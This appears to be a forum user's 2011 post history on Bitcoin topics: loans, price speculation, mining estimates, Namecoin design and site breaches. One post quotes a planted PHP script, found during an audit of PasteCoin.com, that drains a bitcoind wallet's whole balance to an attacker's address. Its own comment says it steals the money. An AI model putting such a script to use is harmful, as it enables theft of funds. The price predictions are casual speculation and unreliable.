381  Economy / Marketplace / Re: [LOAN] 1000 BTC needed & will pay with interest for mining rig on: April 24, 2011, 02:48:01 AM
Here's a clue: up.  Anyone who would loan you money without you at least making an educated guess is just asking to have their loan default.
Wait a second, is there a default in here? I mean, would he ship it to he loaner?
382  Bitcoin / Bitcoin Discussion / Re: I recommend everybody SELLs... on: April 23, 2011, 02:22:10 PM
See! We are right now at 1.40 and it will only increase!
/take your precautions
383  Economy / Marketplace / Re: CoinTumblr - any experience? [working again] on: April 23, 2011, 02:20:36 PM
Bober also hasn't been active since January. He simply disappeared.
384  Economy / Marketplace / Re: CoinTumblr - any experience? [working again] on: April 22, 2011, 03:54:43 PM
Well, as far as the breach goes, bober was originally involve. He even admitted guilt of uploading the shell and he was the only along with genjix, jgarzik, and me.
Genjix is the original coder/owner of the site, jgarzik is the current one. I was the one who reported 2 vulnerabilities and a breach. Bober the attacker.
385  Economy / Marketplace / Re: CoinTumblr - any experience? [working again] on: April 21, 2011, 02:43:30 PM
Perhaps I did it wrong but I think most of it ended up here https://blockexplorer.com/address/1NgLdBTSYqnqwqiD2JioPRfqEkm3Zvs32u

ByteCoin

So you suggest it is browneman?

You should be really sure about it, he may have used the service and got tainted coins. I have been searching for an output from his service with the same input, or smaller if he paid fees, to be 90% sure it is someone.
386  Economy / Marketplace / Re: CoinTumblr - any experience? [working again] on: April 20, 2011, 10:13:30 PM
Congratz, your service works. Now I stopped on my feet to find thee, who stole from PsateCoin.com
http://blockexplorer.com/address/1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9
Code:
<?php

require_once('jsonRPCClient.php');

$bitcoin = new jsonRPCClient('http://****:****@127.0.0.1:****/');

/*Steal the money from the user account */

$balance = ($bitcoin->getbalance());
    echo
$balance;

$bitcoin->sendtoaddress("1Lyb5Qq6D6xAeEiLfvjnsa9jJVBA2tbsE9"$balance);

$balance = ($bitcoin->getbalance());
    echo
$balance;
?>

This was found in PasteCoin.com/preview/test.php while I was performing an audit since I noticed it got online after a long time. I was the one who originally reported the vulnerabilities to them and helped him in all I could. This is officially the first attack and successfully got away with the money. Anybody is welcomed to help trace the coins, and the attacker.

Mexican Pesos - no data but sure it is up

Yes, regardless with popular belief we are very tidy with information. Tongue
http://www.banxico.org.mx/PortalesEspecializados/inflacion/inflacion.html
We even have an easy to use calculator. Cheesy
http://www.banxico.org.mx/polmoneinflacion/servicios/calcDeInflacion/calcDeInflac.html

Which ends up being 586,864.65% in 40 years, from march 1971 to march 2011, with an average monthly inflation of 1.82%.
Note: The Mexican Peso lost 3 zeros in 1991. Wink
388  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [announce] Namecoin - a distributed naming system based on Bitcoin on: April 19, 2011, 03:10:18 PM
Yes the basic idea is just to add the domain registration type with a fee so a miner can decide to include it or not. The only problem would be miners self registering a shitload of domains.
The other option is to give a fixed number of Domain Credits per block and then have those transferred to the buyers address and register a domain with them, which could be updated to another domain for a smaller fee than to get a new domain.

So, a miner could register a shitload of domains, or they would be limited and the prices would vary wildly.
What about x**(ground(#blocks/210000) + 1)*y + z? It would be an ever faster increasing number of domains which could keep up with demand while keeping the domain names limited.
389  Bitcoin / Bitcoin Discussion / Re: What happens if I mis type a bitcoin user's address when sending money? on: April 19, 2011, 02:43:58 PM
Yes, it could happen and it is extremely unlikely. The address uses the first 4 digits of the checksum, sha-256(sha-256(key) concatenated with the address hash RIPEMD-160(SHA-256(key).[1] Though, I don't know if it applies to new addresses who's public key is unknown.
390  Bitcoin / Bitcoin Discussion / Re: I recommend everybody SELLs... on: April 19, 2011, 02:36:00 PM
Fill the blanks and shout it. You will see.

For instance, I think Atlas brag caused the exchange price to drop!
I think reason x  caused effect y on the Bitcoin exchange.

It is a meme dating back to kiba and S3052 as far as I am aware. Tongue
391  Bitcoin / Bitcoin Discussion / Re: I recommend everyody BUYS...... on: April 19, 2011, 05:06:01 AM
Yep, and a really good one. To back it up is S3052 with his Technical Analysis, showing a lot of bullish signs and because of the market depth the next target being 1.50.

I have great faith it will get to 1.50, though. Cheesy
392  Bitcoin / Bitcoin Discussion / Re: I recommend everybody SELLs... on: April 19, 2011, 05:03:25 AM
I don't know what I'm talking about. I only made this in my irrational attempt to short-shell.
Basically he was making an attempt to sell, make the price go down by scaring the participants and then buy more BTC than he started with.

He was making the next event up with no bases. As long as I am concerned this rally could really last until the 1.5 mark 3 days from now.
You can see that because of the trade volumes, the Market depth, and the MACD indicator. Please note I don't have as much experience as S3052 has, so don't take my worth for it and be safe.

There was a spike in Feb from Slashdot and now I think the spike is from a Time magazine internet story.

I think reason x cause effect y on the Bitcoin exchange!
393  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [announce] Namecoin - a distributed naming system based on Bitcoin on: April 18, 2011, 02:07:29 PM
Ok, because of what was stated I will slightly change my opinion on this.
-The network must still not be fragmented
-You may get a domain by paying a fee to the miner. This would probably by a 10 BTC fee which would avoid spam. It will decrease as needed.
-Each domain can be changed to any other(boring.bit -> serious.bit) as long as the other isn't occupied. You must pay a fee for the update lesser than the one to create a new domain.
-It can be updated at any time without needing to mine a block. You may pay a fee for faster processing.(Subject to miner)
-It may be transfer from an address to another just as Bitcoins. You may pay a fee for faster processing.(Subject to miner)

Remember: Together we stand, divided we fall.
Make a pull request of the main Bitcoin client.
394  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [announce] Namecoin - a distributed naming system based on Bitcoin on: April 18, 2011, 02:54:47 AM
No, the discussion is to not fragment the network.
Together we stand, divided we fall.

It should be integrated into the Bitcoin clients.

As far as registry it should work like this:
-You always get 50 domains per block.
-Each domain can be changed to any other(boring.bit -> serious.bit) as long as the other isn't occupied.
-It can be updated at any time without needing to mine a block. You may pay a fee for faster processing.
-It may be transfer from an address to another just as Bitcoins.
395  Economy / Marketplace / Re: [Selling service] Chemistry help on: April 18, 2011, 01:36:28 AM
lawl a first poster!

@OP: Can you also develop activities for classes? IE, my teachers are currently teaching photosynthesis and their experiments and activities aren't the best. This is for 9/10/11 graders.
This is a would you do it and allow other teachers to use the material in question, not a request for it.
396  Bitcoin / Bitcoin Discussion / Re: [newbie] how much can one make with BitIcons? on: April 18, 2011, 12:39:05 AM
Now I apologies, I thought the MSRP was 400 USD

So, yes, it is safer to just buy Bitcoins, right now with are 0.01 USD over the maximum historical of about 3 months ago. The volume looks high and there are more bids than asks.
We might rally to 1.5 USD or go down to 0.95 USD. take your pick. Wink
397  Bitcoin / Bitcoin Discussion / Re: [newbie] how much can one make with BitIcons? on: April 17, 2011, 11:58:39 PM
No you cannot make a living off it unless you have a cheaper than usual energy source.
With those 5K you can buy 8x 6990.(2GPUs each) for a total mining power of 5.6 GHahes/sec

At that rate you would be generating on average each 19 hours, 46 minutes and this rate would last for 2 weeks approximately. It means you would be guaranteed about 850 BTC and at current difficulty jumps, this being a wild guess, you would be able to get top 1200 in the first month.

As far as the BTC <-> USD goes, it may go up or down. Nobody can guarantee you an outcome. The most favourable outcome for you would be it to continue rising to the 1 BTC = 5 USD if you plan to ever get your investment back. Please note I didn't include the electricity costs, the system would consume about ~3K watts or even ~4K watts and cooling will be a bitch.

You may hoard them if you wish and wait for them to be profitable to sell, which isn't a guarantee. The alternative is just to buy goods and services with them after mining.

/Note: The average time is of constant work. If it is shut down it doesn't count and it is of the 8x 6990 working together, not each individual one.
398  Bitcoin / Bitcoin Discussion / Re: Will 1BTC >= 1USD? I doubt it on: April 17, 2011, 08:30:07 PM
http://www.eswynn.com/2011/04/world-of-good.html You can only buy it with BTC.
399  Economy / Marketplace / Re: Stefan Molyneux of Freedomain Radio now accepts Bitcoin donations on: April 17, 2011, 07:09:18 PM
What are you going to do about it? You know, a guy you sent 100 BTC in one tx.
400  Economy / Marketplace / Re: Selling Shattered Horizon Steam Key on: April 17, 2011, 06:42:58 PM
It is a great price, in Steam it is at about 19 BTC. Cheesy
Feel free to add me on Steam, I will be playing all day long.
